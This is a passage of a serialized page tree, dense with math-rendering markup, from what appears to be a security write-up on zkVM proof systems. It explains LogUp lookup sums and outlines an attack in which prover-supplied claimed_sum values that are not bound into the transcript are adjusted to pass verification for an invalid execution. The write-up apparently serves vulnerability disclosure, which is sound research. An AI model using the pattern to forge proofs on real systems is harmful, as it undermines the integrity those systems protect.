7,"props":120946,"children":120948},{"className":120947},[11475,11342],[120949],{"type":33,"value":28967},{"type":27,"tag":207,"props":120951,"children":120953},{"className":120952,"style":120655},[11294,28860,11342],[120954],{"type":33,"value":120658},{"type":27,"tag":207,"props":120956,"children":120958},{"className":120957},[29017],[120959],{"type":33,"value":29020},{"type":27,"tag":207,"props":120961,"children":120963},{"className":120962},[11319],[120964],{"type":27,"tag":207,"props":120965,"children":120967},{"className":120966,"style":120753},[11324],[120968],{"type":27,"tag":207,"props":120969,"children":120970},{},[],{"type":27,"tag":207,"props":120972,"children":120974},{"className":120973,"style":11411},[11372],[],{"type":27,"tag":207,"props":120976,"children":120978},{"className":120977},[11294],[120979,120983,121076],{"type":27,"tag":207,"props":120980,"children":120982},{"className":120981},[28989,120769],[],{"type":27,"tag":207,"props":120984,"children":120986},{"className":120985},[120774],[120987],{"type":27,"tag":207,"props":120988,"children":120990},{"className":120989},[11314,28914],[120991,121065],{"type":27,"tag":207,"props":120992,"children":120994},{"className":120993},[11319],[120995,121060],{"type":27,"tag":207,"props":120996,"children":120998},{"className":120997,"style":120787},[11324],[120999,121029,121040],{"type":27,"tag":207,"props":121000,"children":121001},{"style":120791},[121002,121006],{"type":27,"tag":207,"props":121003,"children":121005},{"className":121004,"style":119422},[11333],[],{"type":27,"tag":207,"props":121007,"children":121009},{"className":121008},[11339,11340,11341,11342],[121010],{"type":27,"tag":207,"props":121011,"children":121013},{"className":121012},[11294,11342],[121014,121019,121024],{"type":27,"tag":207,"props":121015,"children":121017},{"className":121016,"style":120808},[11294,28860,11342],[121018],{"type":33,"value":120811},{"type":27,"tag":207,"props":121020,"children":121022},{"className":121021},[11378,11342],[121023],{"type":33,"value":11353},{"type":27,"tag":207,"props":121025,"children":121027},{"className":121026},[11294,28860,11342],[121028],{"type":33,"value":10512},{"type":27,"tag":207,"props":121030,"children":121031},{"style":120824},[121032,121036],{"type":27,"tag":207,"props":121033,"children":121035},{"className":121034,"style":119422},[11333],[],{"type":27,"tag":207,"props":121037,"children":121039},{"className":121038,"style":120834},[120833],[],{"type":27,"tag":207,"props":121041,"children":121042},{"style":120838},[121043,121047],{"type":27,"tag":207,"props":121044,"children":121046},{"className":121045,"style":119422},[11333],[],{"type":27,"tag":207,"props":121048,"children":121050},{"className":121049},[11339,11340,11341,11342],[121051],{"type":27,"tag":207,"props":121052,"children":121054},{"className":121053},[11294,11342],[121055],{"type":27,"tag":207,"props":121056,"children":121058},{"className":121057},[11294,11342],[121059],{"type":33,"value":1651},{"type":27,"tag":207,"props":121061,"children":121063},{"className":121062},[29017],[121064],{"type":33,"value":29020},{"type":27,"tag":207,"props":121066,"children":121068},{"className":121067},[11319],[121069],{"type":27,"tag":207,"props":121070,"children":121072},{"className":121071,"style":120869},[11324],[121073],{"type":27,"tag":207,"props":121074,"children":121075},{},[],{"type":27,"tag":207,"props":121077,"children":121079},{"className":121078},[29011,120769],[],{"type":27,"tag":36,"props":121081,"children":121082},{},[121083,121085,121110],{"type":33,"value":121084},"for random challenge ",{"type":27,"tag":84,"props":121086,"children":121088},{"className":121087},[11266,11267],[121089],{"type":27,"tag":207,"props":121090,"children":121092},{"className":121091},[11272],[121093],{"type":27,"tag":207,"props":121094,"children":121096},{"className":121095,"ariaHidden":11278},[11277],[121097],{"type":27,"tag":207,"props":121098,"children":121100},{"className":121099},[11283],[121101,121105],{"type":27,"tag":207,"props":121102,"children":121104},{"className":121103,"style":118092},[11288],[],{"type":27,"tag":207,"props":121106,"children":121108},{"className":121107,"style":120808},[11294,28860],[121109],{"type":33,"value":120811},{"type":33,"value":121111},". If the multisets match, the sums are equal. If they differ, the sums differ with overwhelming probability.",{"type":27,"tag":36,"props":121113,"children":121114},{},[121115,121120],{"type":27,"tag":12606,"props":121116,"children":121117},{},[121118],{"type":33,"value":121119},"In zkVMs:",{"type":33,"value":121121}," Different components emit and consume lookup tuples:",{"type":27,"tag":1228,"props":121123,"children":121124},{},[121125,121212],{"type":27,"tag":1232,"props":121126,"children":121127},{},[121128,121130,121156,121158,121183,121185,121211],{"type":33,"value":121129},"CPU emits: \"I read value ",{"type":27,"tag":84,"props":121131,"children":121133},{"className":121132},[11266,11267],[121134],{"type":27,"tag":207,"props":121135,"children":121137},{"className":121136},[11272],[121138],{"type":27,"tag":207,"props":121139,"children":121141},{"className":121140,"ariaHidden":11278},[11277],[121142],{"type":27,"tag":207,"props":121143,"children":121145},{"className":121144},[11283],[121146,121150],{"type":27,"tag":207,"props":121147,"children":121149},{"className":121148,"style":118092},[11288],[],{"type":27,"tag":207,"props":121151,"children":121153},{"className":121152,"style":100750},[11294,28860],[121154],{"type":33,"value":121155},"v",{"type":33,"value":121157}," from address ",{"type":27,"tag":84,"props":121159,"children":121161},{"className":121160},[11266,11267],[121162],{"type":27,"tag":207,"props":121163,"children":121165},{"className":121164},[11272],[121166],{"type":27,"tag":207,"props":121167,"children":121169},{"className":121168,"ariaHidden":11278},[11277],[121170],{"type":27,"tag":207,"props":121171,"children":121173},{"className":121172},[11283],[121174,121178],{"type":27,"tag":207,"props":121175,"children":121177},{"className":121176,"style":118092},[11288],[],{"type":27,"tag":207,"props":121179,"children":121181},{"className":121180},[11294,28860],[121182],{"type":33,"value":47},{"type":33,"value":121184}," at time ",{"type":27,"tag":84,"props":121186,"children":121188},{"className":121187},[11266,11267],[121189],{"type":27,"tag":207,"props":121190,"children":121192},{"className":121191},[11272],[121193],{"type":27,"tag":207,"props":121194,"children":121196},{"className":121195,"ariaHidden":11278},[11277],[121197],{"type":27,"tag":207,"props":121198,"children":121200},{"className":121199},[11283],[121201,121206],{"type":27,"tag":207,"props":121202,"children":121205},{"className":121203,"style":121204},[11288],"height:0.6151em;",[],{"type":27,"tag":207,"props":121207,"children":121209},{"className":121208},[11294,28860],[121210],{"type":33,"value":29002},{"type":33,"value":27331},{"type":27,"tag":1232,"props":121213,"children":121214},{},[121215,121217,121242,121244,121269,121271,121296],{"type":33,"value":121216},"Memory table consumes: \"At time ",{"type":27,"tag":84,"props":121218,"children":121220},{"className":121219},[11266,11267],[121221],{"type":27,"tag":207,"props":121222,"children":121224},{"className":121223},[11272],[121225],{"type":27,"tag":207,"props":121226,"children":121228},{"className":121227,"ariaHidden":11278},[11277],[121229],{"type":27,"tag":207,"props":121230,"children":121232},{"className":121231},[11283],[121233,121237],{"type":27,"tag":207,"props":121234,"children":121236},{"className":121235,"style":121204},[11288],[],{"type":27,"tag":207,"props":121238,"children":121240},{"className":121239},[11294,28860],[121241],{"type":33,"value":29002},{"type":33,"value":121243},", address ",{"type":27,"tag":84,"props":121245,"children":121247},{"className":121246},[11266,11267],[121248],{"type":27,"tag":207,"props":121249,"children":121251},{"className":121250},[11272],[121252],{"type":27,"tag":207,"props":121253,"children":121255},{"className":121254,"ariaHidden":11278},[11277],[121256],{"type":27,"tag":207,"props":121257,"children":121259},{"className":121258},[11283],[121260,121264],{"type":27,"tag":207,"props":121261,"children":121263},{"className":121262,"style":118092},[11288],[],{"type":27,"tag":207,"props":121265,"children":121267},{"className":121266},[11294,28860],[121268],{"type":33,"value":47},{"type":33,"value":121270}," contained ",{"type":27,"tag":84,"props":121272,"children":121274},{"className":121273},[11266,11267],[121275],{"type":27,"tag":207,"props":121276,"children":121278},{"className":121277},[11272],[121279],{"type":27,"tag":207,"props":121280,"children":121282},{"className":121281,"ariaHidden":11278},[11277],[121283],{"type":27,"tag":207,"props":121284,"children":121286},{"className":121285},[11283],[121287,121291],{"type":27,"tag":207,"props":121288,"children":121290},{"className":121289,"style":118092},[11288],[],{"type":27,"tag":207,"props":121292,"children":121294},{"className":121293,"style":100750},[11294,28860],[121295],{"type":33,"value":121155},{"type":33,"value":27331},{"type":27,"tag":36,"props":121298,"children":121299},{},[121300],{"type":33,"value":121301},"If everything balances, the execution is consistent.",{"type":27,"tag":36,"props":121303,"children":121304},{},[121305,121310],{"type":27,"tag":12606,"props":121306,"children":121307},{},[121308],{"type":33,"value":121309},"The claimed_sum:",{"type":33,"value":121311}," Each component computes its contribution to the LogUp sum:",{"type":27,"tag":36,"props":121313,"children":121314},{},[121315],{"type":27,"tag":84,"props":121316,"children":121318},{"className":121317},[11266,11267],[121319],{"type":27,"tag":207,"props":121320,"children":121322},{"className":121321},[11272],[121323],{"type":27,"tag":207,"props":121324,"children":121326},{"className":121325,"ariaHidden":11278},[11277],[121327,121425,121676],{"type":27,"tag":207,"props":121328,"children":121330},{"className":121329},[11283],[121331,121335,121345,121350,121412,121416,121421],{"type":27,"tag":207,"props":121332,"children":121334},{"className":121333,"style":101677},[11288],[],{"type":27,"tag":207,"props":121336,"children":121338},{"className":121337},[11294,33],[121339],{"type":27,"tag":207,"props":121340,"children":121342},{"className":121341},[11294],[121343],{"type":33,"value":121344},"claimed",{"type":27,"tag":207,"props":121346,"children":121348},{"className":121347,"style":100264},[11294],[121349],{"type":33,"value":10371},{"type":27,"tag":207,"props":121351,"children":121353},{"className":121352},[11294],[121354,121363],{"type":27,"tag":207,"props":121355,"children":121357},{"className":121356},[11294,33],[121358],{"type":27,"tag":207,"props":121359,"children":121361},{"className":121360},[11294],[121362],{"type":33,"value":83863},{"type":27,"tag":207,"props":121364,"children":121366},{"className":121365},[11309],[121367],{"type":27,"tag":207,"props":121368,"children":121370},{"className":121369},[11314,28914],[121371,121401],{"type":27,"tag":207,"props":121372,"children":121374},{"className":121373},[11319],[121375,121396],{"type":27,"tag":207,"props":121376,"children":121378},{"className":121377,"style":100793},[11324],[121379],{"type":27,"tag":207,"props":121380,"children":121382},{"style":121381},"top:-2.55em;margin-right:0.05em;",[121383,121387],{"type":27,"tag":207,"props":121384,"children":121386},{"className":121385,"style":11334},[11333],[],{"type":27,"tag":207,"props":121388,"children":121390},{"className":121389},[11339,11340,11341,11342],[121391],{"type":27,"tag":207,"props":121392,"children":121394},{"className":121393},[11294,28860,11342],[121395],{"type":33,"value":4690},{"type":27,"tag":207,"props":121397,"children":121399},{"className":121398},[29017],[121400],{"type":33,"value":29020},{"type":27,"tag":207,"props":121402,"children":121404},{"className":121403},[11319],[121405],{"type":27,"tag":207,"props":121406,"children":121408},{"className":121407,"style":100347},[11324],[121409],{"type":27,"tag":207,"props":121410,"children":121411},{},[],{"type":27,"tag":207,"props":121413,"children":121415},{"className":121414,"style":11470},[11372],[],{"type":27,"tag":207,"props":121417,"children":121419},{"className":121418},[11475],[121420],{"type":33,"value":10380},{"type":27,"tag":207,"props":121422,"children":121424},{"className":121423,"style":11470},[11372],[],{"type":27,"tag":207,"props":121426,"children":121428},{"className":121427},[11283],[121429,121434,121494,121498,121663,121667,121672],{"type":27,"tag":207,"props":121430,"children":121433},{"className":121431,"style":121432},[11288],"height:1.3874em;vertical-align:-0.5423em;",[],{"type":27,"tag":207,"props":121435,"children":121437},{"className":121436},[28896],[121438,121443],{"type":27,"tag":207,"props":121439,"children":121441},{"className":121440,"style":28903},[28896,28901,28902],[121442],{"type":33,"value":116046},{"type":27,"tag":207,"props":121444,"children":121446},{"className":121445},[11309],[121447],{"type":27,"tag":207,"props":121448,"children":121450},{"className":121449},[11314,28914],[121451,121482],{"type":27,"tag":207,"props":121452,"children":121454},{"className":121453},[11319],[121455,121477],{"type":27,"tag":207,"props":121456,"children":121459},{"className":121457,"style":121458},[11324],"height:0.162em;",[121460],{"type":27,"tag":207,"props":121461,"children":121462},{"style":28927},[121463,121467],{"type":27,"tag":207,"props":121464,"children":121466},{"className":121465,"style":11334},[11333],[],{"type":27,"tag":207,"props":121468,"children":121470},{"className":121469},[11339,11340,11341,11342],[121471],{"type":27,"tag":207,"props":121472,"children":121475},{"className":121473,"style":121474},[11294,28860,11342],"margin-right:0.05724em;",[121476],{"type":33,"value":15937},{"type":27,"tag":207,"props":121478,"children":121480},{"className":121479},[29017],[121481],{"type":33,"value":29020},{"type":27,"tag":207,"props":121483,"children":121485},{"className":121484},[11319],[121486],{"type":27,"tag":207,"props":121487,"children":121490},{"className":121488,"style":121489},[11324],"height:0.4358em;",[121491],{"type":27,"tag":207,"props":121492,"children":121493},{},[],{"type":27,"tag":207,"props":121495,"children":121497},{"className":121496,"style":11411},[11372],[],{"type":27,"tag":207,"props":121499,"children":121501},{"className":121500},[11294],[121502,121506,121659],{"type":27,"tag":207,"props":121503,"children":121505},{"className":121504},[28989,120769],[],{"type":27,"tag":207,"props":121507,"children":121509},{"className":121508},[120774],[121510],{"type":27,"tag":207,"props":121511,"children":121513},{"className":121512},[11314,28914],[121514,121647],{"type":27,"tag":207,"props":121515,"children":121517},{"className":121516},[11319],[121518,121642],{"type":27,"tag":207,"props":121519,"children":121521},{"className":121520,"style":120787},[11324],[121522,121611,121622],{"type":27,"tag":207,"props":121523,"children":121524},{"style":120791},[121525,121529],{"type":27,"tag":207,"props":121526,"children":121528},{"className":121527,"style":119422},[11333],[],{"type":27,"tag":207,"props":121530,"children":121532},{"className":121531},[11339,11340,11341,11342],[121533],{"type":27,"tag":207,"props":121534,"children":121536},{"className":121535},[11294,11342],[121537,121542,121547],{"type":27,"tag":207,"props":121538,"children":121540},{"className":121539,"style":120808},[11294,28860,11342],[121541],{"type":33,"value":120811},{"type":27,"tag":207,"props":121543,"children":121545},{"className":121544},[11378,11342],[121546],{"type":33,"value":11353},{"type":27,"tag":207,"props":121548,"children":121550},{"className":121549},[11294,11342],[121551,121560],{"type":27,"tag":207,"props":121552,"children":121554},{"className":121553},[11294,33,11342],[121555],{"type":27,"tag":207,"props":121556,"children":121558},{"className":121557},[11294,11342],[121559],{"type":33,"value":69240},{"type":27,"tag":207,"props":121561,"children":121563},{"className":121562},[11309],[121564],{"type":27,"tag":207,"props":121565,"children":121567},{"className":121566},[11314,28914],[121568,121599],{"type":27,"tag":207,"props":121569,"children":121571},{"className":121570},[11319],[121572,121594],{"type":27,"tag":207,"props":121573,"children":121576},{"className":121574,"style":121575},[11324],"height:0.3281em;",[121577],{"type":27,"tag":207,"props":121578,"children":121580},{"style":121579},"top:-2.357em;margin-right:0.0714em;",[121581,121585],{"type":27,"tag":207,"props":121582,"children":121584},{"className":121583,"style":116111},[11333],[],{"type":27,"tag":207,"props":121586,"children":121588},{"className":121587},[11339,116116,116117,11342],[121589],{"type":27,"tag":207,"props":121590,"children":121592},{"className":121591,"style":121474},[11294,28860,11342],[121593],{"type":33,"value":15937},{"type":27,"tag":207,"props":121595,"children":121597},{"className":121596},[29017],[121598],{"type":33,"value":29020},{"type":27,"tag":207,"props":121600,"children":121602},{"className":121601},[11319],[121603],{"type":27,"tag":207,"props":121604,"children":121607},{"className":121605,"style":121606},[11324],"height:0.2819em;",[121608],{"type":27,"tag":207,"props":121609,"children":121610},{},[],{"type":27,"tag":207,"props":121612,"children":121613},{"style":120824},[121614,121618],{"type":27,"tag":207,"props":121615,"children":121617},{"className":121616,"style":119422},[11333],[],{"type":27,"tag":207,"props":121619,"children":121621},{"className":121620,"style":120834},[120833],[],{"type":27,"tag":207,"props":121623,"children":121624},{"style":120838},[121625,121629],{"type":27,"tag":207,"props":121626,"children":121628},{"className":121627,"style":119422},[11333],[],{"type":27,"tag":207,"props":121630,"children":121632},{"className":121631},[11339,11340,11341,11342],[121633],{"type":27,"tag":207,"props":121634,"children":121636},{"className":121635},[11294,11342],[121637],{"type":27,"tag":207,"props":121638,"children":121640},{"className":121639},[11294,11342],[121641],{"type":33,"value":1651},{"type":27,"tag":207,"props":121643,"children":121645},{"className":121644},[29017],[121646],{"type":33,"value":29020},{"type":27,"tag":207,"props":121648,"children":121650},{"className":121649},[11319],[121651],{"type":27,"tag":207,"props":121652,"children":121655},{"className":121653,"style":121654},[11324],"height:0.5423em;",[121656],{"type":27,"tag":207,"props":121657,"children":121658},{},[],{"type":27,"tag":207,"props":121660,"children":121662},{"className":121661},[29011,120769],[],{"type":27,"tag":207,"props":121664,"children":121666},{"className":121665,"style":11373},[11372],[],{"type":27,"tag":207,"props":121668,"children":121670},{"className":121669},[11378],[121671],{"type":33,"value":11353},{"type":27,"tag":207,"props":121673,"children":121675},{"className":121674,"style":11373},[11372],[],{"type":27,"tag":207,"props":121677,"children":121679},{"className":121678},[11283],[121680,121685,121743,121747],{"type":27,"tag":207,"props":121681,"children":121684},{"className":121682,"style":121683},[11288],"height:1.296em;vertical-align:-0.4509em;",[],{"type":27,"tag":207,"props":121686,"children":121688},{"className":121687},[28896],[121689,121694],{"type":27,"tag":207,"props":121690,"children":121692},{"className":121691,"style":28903},[28896,28901,28902],[121693],{"type":33,"value":116046},{"type":27,"tag":207,"props":121695,"children":121697},{"className":121696},[11309],[121698],{"type":27,"tag":207,"props":121699,"children":121701},{"className":121700},[11314,28914],[121702,121731],{"type":27,"tag":207,"props":121703,"children":121705},{"className":121704},[11319],[121706,121726],{"type":27,"tag":207,"props":121707,"children":121709},{"className":121708,"style":120923},[11324],[121710],{"type":27,"tag":207,"props":121711,"children":121712},{"style":28927},[121713,121717],{"type":27,"tag":207,"props":121714,"children":121716},{"className":121715,"style":11334},[11333],[],{"type":27,"tag":207,"props":121718,"children":121720},{"className":121719},[11339,11340,11341,11342],[121721],{"type":27,"tag":207,"props":121722,"children":121724},{"className":121723,"style":101693},[11294,28860,11342],[121725],{"type":33,"value":95904},{"type":27,"tag":207,"props":121727,"children":121729},{"className":121728},[29017],[121730],{"type":33,"value":29020},{"type":27,"tag":207,"props":121732,"children":121734},{"className":121733},[11319],[121735],{"type":27,"tag":207,"props":121736,"children":121739},{"className":121737,"style":121738},[11324],"height:0.2997em;",[121740],{"type":27,"tag":207,"props":121741,"children":121742},{},[],{"type":27,"tag":207,"props":121744,"children":121746},{"className":121745,"style":11411},[11372],[],{"type":27,"tag":207,"props":121748,"children":121750},{"className":121749},[11294],[121751,121755,121908],{"type":27,"tag":207,"props":121752,"children":121754},{"className":121753},[28989,120769],[],{"type":27,"tag":207,"props":121756,"children":121758},{"className":121757},[120774],[121759],{"type":27,"tag":207,"props":121760,"children":121762},{"className":121761},[11314,28914],[121763,121896],{"type":27,"tag":207,"props":121764,"children":121766},{"className":121765},[11319],[121767,121891],{"type":27,"tag":207,"props":121768,"children":121770},{"className":121769,"style":120787},[11324],[121771,121860,121871],{"type":27,"tag":207,"props":121772,"children":121773},{"style":120791},[121774,121778],{"type":27,"tag":207,"props":121775,"children":121777},{"className":121776,"style":119422},[11333],[],{"type":27,"tag":207,"props":121779,"children":121781},{"className":121780},[11339,11340,11341,11342],[121782],{"type":27,"tag":207,"props":121783,"children":121785},{"className":121784},[11294,11342],[121786,121791,121796],{"type":27,"tag":207,"props":121787,"children":121789},{"className":121788,"style":120808},[11294,28860,11342],[121790],{"type":33,"value":120811},{"type":27,"tag":207,"props":121792,"children":121794},{"className":121793},[11378,11342],[121795],{"type":33,"value":11353},{"type":27,"tag":207,"props":121797,"children":121799},{"className":121798},[11294,11342],[121800,121810],{"type":27,"tag":207,"props":121801,"children":121803},{"className":121802},[11294,33,11342],[121804],{"type":27,"tag":207,"props":121805,"children":121807},{"className":121806},[11294,11342],[121808],{"type":33,"value":121809},"consume",{"type":27,"tag":207,"props":121811,"children":121813},{"className":121812},[11309],[121814],{"type":27,"tag":207,"props":121815,"children":121817},{"className":121816},[11314,28914],[121818,121848],{"type":27,"tag":207,"props":121819,"children":121821},{"className":121820},[11319],[121822,121843],{"type":27,"tag":207,"props":121823,"children":121825},{"className":121824,"style":119583},[11324],[121826],{"type":27,"tag":207,"props":121827,"children":121829},{"style":121828},"top:-2.3488em;margin-right:0.0714em;",[121830,121834],{"type":27,"tag":207,"props":121831,"children":121833},{"className":121832,"style":116111},[11333],[],{"type":27,"tag":207,"props":121835,"children":121837},{"className":121836},[11339,116116,116117,11342],[121838],{"type":27,"tag":207,"props":121839,"children":121841},{"className":121840,"style":101693},[11294,28860,11342],[121842],{"type":33,"value":95904},{"type":27,"tag":207,"props":121844,"children":121846},{"className":121845},[29017],[121847],{"type":33,"value":29020},{"type":27,"tag":207,"props":121849,"children":121851},{"className":121850},[11319],[121852],{"type":27,"tag":207,"props":121853,"children":121856},{"className":121854,"style":121855},[11324],"height:0.1512em;",[121857],{"type":27,"tag":207,"props":121858,"children":121859},{},[],{"type":27,"tag":207,"props":121861,"children":121862},{"style":120824},[121863,121867],{"type":27,"tag":207,"props":121864,"children":121866},{"className":121865,"style":119422},[11333],[],{"type":27,"tag":207,"props":121868,"children":121870},{"className":121869,"style":120834},[120833],[],{"type":27,"tag":207,"props":121872,"children":121873},{"style":120838},[121874,121878],{"type":27,"tag":207,"props":121875,"children":121877},{"className":121876,"style":119422},[11333],[],{"type":27,"tag":207,"props":121879,"children":121881},{"className":121880},[11339,11340,11341,11342],[121882],{"type":27,"tag":207,"props":121883,"children":121885},{"className":121884},[11294,11342],[121886],{"type":27,"tag":207,"props":121887,"children":121889},{"className":121888},[11294,11342],[121890],{"type":33,"value":1651},{"type":27,"tag":207,"props":121892,"children":121894},{"className":121893},[29017],[121895],{"type":33,"value":29020},{"type":27,"tag":207,"props":121897,"children":121899},{"className":121898},[11319],[121900],{"type":27,"tag":207,"props":121901,"children":121904},{"className":121902,"style":121903},[11324],"height:0.4509em;",[121905],{"type":27,"tag":207,"props":121906,"children":121907},{},[],{"type":27,"tag":207,"props":121909,"children":121911},{"className":121910},[29011,120769],[],{"type":27,"tag":36,"props":121913,"children":121914},{},[121915,121917,122099],{"type":33,"value":121916},"The global check: ",{"type":27,"tag":84,"props":121918,"children":121920},{"className":121919},[11266,11267],[121921],{"type":27,"tag":207,"props":121922,"children":121924},{"className":121923},[11272],[121925],{"type":27,"tag":207,"props":121926,"children":121928},{"className":121927,"ariaHidden":11278},[11277],[121929,122086],{"type":27,"tag":207,"props":121930,"children":121932},{"className":121931},[11283],[121933,121937,121994,121998,122007,122012,122073,122077,122082],{"type":27,"tag":207,"props":121934,"children":121936},{"className":121935,"style":100206},[11288],[],{"type":27,"tag":207,"props":121938,"children":121940},{"className":121939},[28896],[121941,121946],{"type":27,"tag":207,"props":121942,"children":121944},{"className":121943,"style":28903},[28896,28901,28902],[121945],{"type":33,"value":116046},{"type":27,"tag":207,"props":121947,"children":121949},{"className":121948},[11309],[121950],{"type":27,"tag":207,"props":121951,"children":121953},{"className":121952},[11314,28914],[121954,121983],{"type":27,"tag":207,"props":121955,"children":121957},{"className":121956},[11319],[121958,121978],{"type":27,"tag":207,"props":121959,"children":121961},{"className":121960,"style":121458},[11324],[121962],{"type":27,"tag":207,"props":121963,"children":121964},{"style":28927},[121965,121969],{"type":27,"tag":207,"props":121966,"children":121968},{"className":121967,"style":11334},[11333],[],{"type":27,"tag":207,"props":121970,"children":121972},{"className":121971},[11339,11340,11341,11342],[121973],{"type":27,"tag":207,"props":121974,"children":121976},{"className":121975},[11294,28860,11342],[121977],{"type":33,"value":4690},{"type":27,"tag":207,"props":121979,"children":121981},{"className":121980},[29017],[121982],{"type":33,"value":29020},{"type":27,"tag":207,"props":121984,"children":121986},{"className":121985},[11319],[121987],{"type":27,"tag":207,"props":121988,"children":121990},{"className":121989,"style":121738},[11324],[121991],{"type":27,"tag":207,"props":121992,"children":121993},{},[],{"type":27,"tag":207,"props":121995,"children":121997},{"className":121996,"style":11411},[11372],[],{"type":27,"tag":207,"props":121999,"children":122001},{"className":122000},[11294,33],[122002],{"type":27,"tag":207,"props":122003,"children":122005},{"className":122004},[11294],[122006],{"type":33,"value":121344},{"type":27,"tag":207,"props":122008,"children":122010},{"className":122009,"style":100264},[11294],[122011],{"type":33,"value":10371},{"type":27,"tag":207,"props":122013,"children":122015},{"className":122014},[11294],[122016,122025],{"type":27,"tag":207,"props":122017,"children":122019},{"className":122018},[11294,33],[122020],{"type":27,"tag":207,"props":122021,"children":122023},{"className":122022},[11294],[122024],{"type":33,"value":83863},{"type":27,"tag":207,"props":122026,"children":122028},{"className":122027},[11309],[122029],{"type":27,"tag":207,"props":122030,"children":122032},{"className":122031},[11314,28914],[122033,122062],{"type":27,"tag":207,"props":122034,"children":122036},{"className":122035},[11319],[122037,122057],{"type":27,"tag":207,"props":122038,"children":122040},{"className":122039,"style":100793},[11324],[122041],{"type":27,"tag":207,"props":122042,"children":122043},{"style":121381},[122044,122048],{"type":27,"tag":207,"props":122045,"children":122047},{"className":122046,"style":11334},[11333],[],{"type":27,"tag":207,"props":122049,"children":122051},{"className":122050},[11339,11340,11341,11342],[122052],{"type":27,"tag":207,"props":122053,"children":122055},{"className":122054},[11294,28860,11342],[122056],{"type":33,"value":4690},{"type":27,"tag":207,"props":122058,"children":122060},{"className":122059},[29017],[122061],{"type":33,"value":29020},{"type":27,"tag":207,"props":122063,"children":122065},{"className":122064},[11319],[122066],{"type":27,"tag":207,"props":122067,"children":122069},{"className":122068,"style":100347},[11324],[122070],{"type":27,"tag":207,"props":122071,"children":122072},{},[],{"type":27,"tag":207,"props":122074,"children":122076},{"className":122075,"style":11470},[11372],[],{"type":27,"tag":207,"props":122078,"children":122080},{"className":122079},[11475],[122081],{"type":33,"value":10380},{"type":27,"tag":207,"props":122083,"children":122085},{"className":122084,"style":11470},[11372],[],{"type":27,"tag":207,"props":122087,"children":122089},{"className":122088},[11283],[122090,122094],{"type":27,"tag":207,"props":122091,"children":122093},{"className":122092,"style":101295},[11288],[],{"type":27,"tag":207,"props":122095,"children":122097},{"className":122096},[11294],[122098],{"type":33,"value":1660},{"type":33,"value":1041},{"type":27,"tag":36,"props":122101,"children":122102},{},[122103,122108,122110,122116],{"type":27,"tag":12606,"props":122104,"children":122105},{},[122106],{"type":33,"value":122107},"Why this is vulnerable:",{"type":33,"value":122109}," The ",{"type":27,"tag":84,"props":122111,"children":122113},{"className":122112},[],[122114],{"type":33,"value":122115},"claimed_sum",{"type":33,"value":122117}," values are prover-supplied. If they're not in the transcript before challenges are derived, the prover can adjust them to make the sum zero for an invalid execution.",{"type":27,"tag":26063,"props":122119,"children":122120},{},[],{"type":27,"tag":28,"props":122122,"children":122124},{"id":122123},"the-universal-attack-pattern",[122125],{"type":33,"value":122126},"The Universal Attack Pattern",{"type":27,"tag":36,"props":122128,"children":122129},{},[122130],{"type":33,"value":122131},"Now we can describe the attack pattern that works on all six systems:",{"type":27,"tag":36,"props":122133,"children":122134},{},[122135],{"type":27,"tag":126,"props":122136,"children":122139},{"alt":122137,"src":122138},"2_attack_pattern","/posts/zkvms-unfaithful-claims/2_attack_pattern.svg",[],{"type":27,"tag":36,"props":122141,"children":122142},{},[122143,122145,122170],{"type":33,"value":122144},"When a value ",{"type":27,"tag":84,"props":122146,"children":122148},{"className":122147},[11266,11267],[122149],{"type":27,"tag":207,"props":122150,"children":122152},{"className":122151},[11272],[122153],{"type":27,"tag":207,"props":122154,"children":122156},{"className":122155,"ariaHidden":11278},[11277],[122157],{"type":27,"tag":207,"props":122158,"children":122160},{"className":122159},[11283],[122161,122165],{"type":27,"tag":207,"props":122162,"children":122164},{"className":122163,"style":28855},[11288],[],{"type":27,"tag":207,"props":122166,"children":122168},{"className":122167,"style":115449},[11294,28860],[122169],{"type":33,"value":115773},{"type":33,"value":122171}," isn't transcript-bound:",{"type":27,"tag":12719,"props":122173,"children":122174},{},[122175,122206,122282,122427],{"type":27,"tag":1232,"props":122176,"children":122177},{},[122178,122180,122205],{"type":33,"value":122179},"Challenges are fixed (independent of ",{"type":27,"tag":84,"props":122181,"children":122183},{"className":122182},[11266,11267],[122184],{"type":27,"tag":207,"props":122185,"children":122187},{"className":122186},[11272],[122188],{"type":27,"tag":207,"props":122189,"children":122191},{"className":122190,"ariaHidden":11278},[11277],[122192],{"type":27,"tag":207,"props":122193,"children":122195},{"className":122194},[11283],[122196,122200],{"type":27,"tag":207,"props":122197,"children":122199},{"className":122198,"style":28855},[11288],[],{"type":27,"tag":207,"props":122201,"children":122203},{"className":122202,"style":115449},[11294,28860],[122204],{"type":33,"value":115773},{"type":33,"value":10416},{"type":27,"tag":1232,"props":122207,"children":122208},{},[122209,122211],{"type":33,"value":122210},"The verification equation has form: ",{"type":27,"tag":84,"props":122212,"children":122214},{"className":122213},[11266,11267],[122215],{"type":27,"tag":207,"props":122216,"children":122218},{"className":122217},[11272],[122219],{"type":27,"tag":207,"props":122220,"children":122222},{"className":122221,"ariaHidden":11278},[11277],[122223,122264],{"type":27,"tag":207,"props":122224,"children":122226},{"className":122225},[11283],[122227,122231,122236,122241,122246,122251,122255,122260],{"type":27,"tag":207,"props":122228,"children":122230},{"className":122229,"style":11393},[11288],[],{"type":27,"tag":207,"props":122232,"children":122234},{"className":122233,"style":102618},[11294,28860],[122235],{"type":33,"value":7596},{"type":27,"tag":207,"props":122237,"children":122239},{"className":122238},[28989],[122240],{"type":33,"value":1343},{"type":27,"tag":207,"props":122242,"children":122244},{"className":122243,"style":115449},[11294,28860],[122245],{"type":33,"value":115773},{"type":27,"tag":207,"props":122247,"children":122249},{"className":122248},[29011],[122250],{"type":33,"value":10416},{"type":27,"tag":207,"props":122252,"children":122254},{"className":122253,"style":11470},[11372],[],{"type":27,"tag":207,"props":122256,"children":122258},{"className":122257},[11475],[122259],{"type":33,"value":10380},{"type":27,"tag":207,"props":122261,"children":122263},{"className":122262,"style":11470},[11372],[],{"type":27,"tag":207,"props":122265,"children":122267},{"className":122266},[11283],[122268,122273],{"type":27,"tag":207,"props":122269,"children":122272},{"className":122270,"style":122271},[11288],"height:0.8095em;vertical-align:-0.1944em;",[],{"type":27,"tag":207,"props":122274,"children":122276},{"className":122275},[11294,33],[122277],{"type":27,"tag":207,"props":122278,"children":122280},{"className":122279},[11294],[122281],{"type":33,"value":8941},{"type":27,"tag":1232,"props":122283,"children":122284},{},[122285,122286,122312,122314],{"type":33,"value":14762},{"type":27,"tag":84,"props":122287,"children":122289},{"className":122288},[11266,11267],[122290],{"type":27,"tag":207,"props":122291,"children":122293},{"className":122292},[11272],[12229